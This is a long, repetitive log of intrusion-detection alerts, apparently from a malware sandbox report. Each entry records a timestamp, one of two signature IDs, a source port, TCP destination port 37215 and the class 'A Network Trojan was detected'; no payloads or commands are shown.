                  Timestamp:07/10/24-08:27:14.825721
                  SID:2835222
                  Source Port:54272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2835222
                  Source Port:33534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2829579
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2829579
                  Source Port:60898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2835222
                  Source Port:46090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.292771
                  SID:2829579
                  Source Port:44842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2835222
                  Source Port:34976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300901
                  SID:2835222
                  Source Port:60180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.866778
                  SID:2829579
                  Source Port:36934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2835222
                  Source Port:50414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605753
                  SID:2835222
                  Source Port:54758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.524985
                  SID:2835222
                  Source Port:33660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.891770
                  SID:2835222
                  Source Port:36060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2829579
                  Source Port:55470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.860013
                  SID:2829579
                  Source Port:48520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.152826
                  SID:2829579
                  Source Port:36774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.649070
                  SID:2829579
                  Source Port:45426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2835222
                  Source Port:34348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990905
                  SID:2829579
                  Source Port:47542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896785
                  SID:2829579
                  Source Port:40848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566844
                  SID:2829579
                  Source Port:60990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.255298
                  SID:2829579
                  Source Port:60302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2829579
                  Source Port:36520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2835222
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837905
                  SID:2835222
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.121888
                  SID:2829579
                  Source Port:48472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.446597
                  SID:2829579
                  Source Port:46126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2829579
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:45312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.587984
                  SID:2835222
                  Source Port:53226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207243
                  SID:2835222
                  Source Port:49036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2835222
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037759
                  SID:2829579
                  Source Port:48368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.314793
                  SID:2835222
                  Source Port:52682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2835222
                  Source Port:39990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.634694
                  SID:2829579
                  Source Port:48200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594913
                  SID:2829579
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2829579
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252784
                  SID:2835222
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.819826
                  SID:2829579
                  Source Port:40874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.886736
                  SID:2835222
                  Source Port:46652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2829579
                  Source Port:54332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2829579
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242773
                  SID:2835222
                  Source Port:54042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.500429
                  SID:2835222
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.303627
                  SID:2835222
                  Source Port:36070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410234
                  SID:2835222
                  Source Port:56066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2829579
                  Source Port:59954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.512064
                  SID:2835222
                  Source Port:47760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425818
                  SID:2835222
                  Source Port:52444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.891312
                  SID:2829579
                  Source Port:44696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.964630
                  SID:2829579
                  Source Port:34226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.217430
                  SID:2829579
                  Source Port:56848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047210
                  SID:2829579
                  Source Port:39472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285425
                  SID:2829579
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811605
                  SID:2835222
                  Source Port:47638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880668
                  SID:2829579
                  Source Port:45918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.435819
                  SID:2829579
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2835222
                  Source Port:39064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542480
                  SID:2829579
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.987435
                  SID:2835222
                  Source Port:53134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2835222
                  Source Port:57246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2829579
                  Source Port:43336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2835222
                  Source Port:36490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2835222
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883547
                  SID:2829579
                  Source Port:51212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2829579
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003216
                  SID:2835222
                  Source Port:42226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2829579
                  Source Port:43776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2829579
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2829579
                  Source Port:41486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2829579
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522435
                  SID:2829579
                  Source Port:54442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2835222
                  Source Port:58434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105620
                  SID:2829579
                  Source Port:60508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.109229
                  SID:2835222
                  Source Port:35442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.602684
                  SID:2835222
                  Source Port:48840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877768
                  SID:2835222
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.524436
                  SID:2835222
                  Source Port:52874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985178
                  SID:2829579
                  Source Port:50932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811511
                  SID:2829579
                  Source Port:42988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026941
                  SID:2835222
                  Source Port:41786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:47538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2835222
                  Source Port:43838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2835222
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2835222
                  Source Port:41600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2829579
                  Source Port:52542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384495
                  SID:2835222
                  Source Port:58064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2835222
                  Source Port:51382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:58836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.742007
                  SID:2835222
                  Source Port:54058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.377315
                  SID:2829579
                  Source Port:54646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2829579
                  Source Port:37078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896757
                  SID:2835222
                  Source Port:40216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851714
                  SID:2835222
                  Source Port:52288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2829579
                  Source Port:54350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.402379
                  SID:2835222
                  Source Port:41356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2835222
                  Source Port:50912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758146
                  SID:2829579
                  Source Port:35046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041359
                  SID:2829579
                  Source Port:51410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2829579
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339309
                  SID:2835222
                  Source Port:58344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.177890
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2829579
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2835222
                  Source Port:49272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651235
                  SID:2829579
                  Source Port:53974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514840
                  SID:2835222
                  Source Port:40586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.337893
                  SID:2829579
                  Source Port:50144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:60958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030502
                  SID:2835222
                  Source Port:60440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.127756
                  SID:2835222
                  Source Port:37300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637493
                  SID:2829579
                  Source Port:36918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.126065
                  SID:2829579
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2835222
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:38224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.519262
                  SID:2835222
                  Source Port:57722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.063686
                  SID:2829579
                  Source Port:43006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2829579
                  Source Port:53700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2829579
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019858
                  SID:2835222
                  Source Port:48272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.977576
                  SID:2829579
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.983815
                  SID:2835222
                  Source Port:54150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838933
                  SID:2835222
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182114
                  SID:2829579
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2829579
                  Source Port:47752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2835222
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.088418
                  SID:2835222
                  Source Port:46372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2829579
                  Source Port:52606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2835222
                  Source Port:45394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.451839
                  SID:2835222
                  Source Port:57526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2829579
                  Source Port:37978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.409560
                  SID:2829579
                  Source Port:59732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.796224
                  SID:2829579
                  Source Port:37006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.931862
                  SID:2829579
                  Source Port:44164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.793102
                  SID:2829579
                  Source Port:55630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2829579
                  Source Port:45228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463923
                  SID:2829579
                  Source Port:56116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2835222
                  Source Port:56094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.451906
                  SID:2829579
                  Source Port:46884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423950
                  SID:2829579
                  Source Port:36580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811319
                  SID:2835222
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2835222
                  Source Port:42402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.154911
                  SID:2829579
                  Source Port:32960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.484132
                  SID:2829579
                  Source Port:40190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015608
                  SID:2835222
                  Source Port:50970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037621
                  SID:2835222
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2829579
                  Source Port:58994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.366890
                  SID:2835222
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2835222
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2835222
                  Source Port:36996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2835222
                  Source Port:45024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2829579
                  Source Port:39882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2835222
                  Source Port:50884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.582733
                  SID:2829579
                  Source Port:51334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.655987
                  SID:2829579
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2829579
                  Source Port:33670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:43870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2835222
                  Source Port:54858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2835222
                  Source Port:58052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2829579
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2835222
                  Source Port:37034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.103998
                  SID:2829579
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2835222
                  Source Port:49486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.831803
                  SID:2829579
                  Source Port:46318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.919508
                  SID:2835222
                  Source Port:60632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2835222
                  Source Port:44640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.880984
                  SID:2829579
                  Source Port:52332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.931783
                  SID:2835222
                  Source Port:45792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.898002
                  SID:2829579
                  Source Port:57536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2835222
                  Source Port:46840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.754938
                  SID:2835222
                  Source Port:36232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2829579
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527013
                  SID:2835222
                  Source Port:60380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151496
                  SID:2835222
                  Source Port:47436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941159
                  SID:2835222
                  Source Port:51302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.080218
                  SID:2835222
                  Source Port:50900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.822276
                  SID:2835222
                  Source Port:51742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.838823
                  SID:2835222
                  Source Port:43782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2829579
                  Source Port:35802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758860
                  SID:2835222
                  Source Port:50588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.461757
                  SID:2835222
                  Source Port:59274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.898943
                  SID:2835222
                  Source Port:36102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384814
                  SID:2829579
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
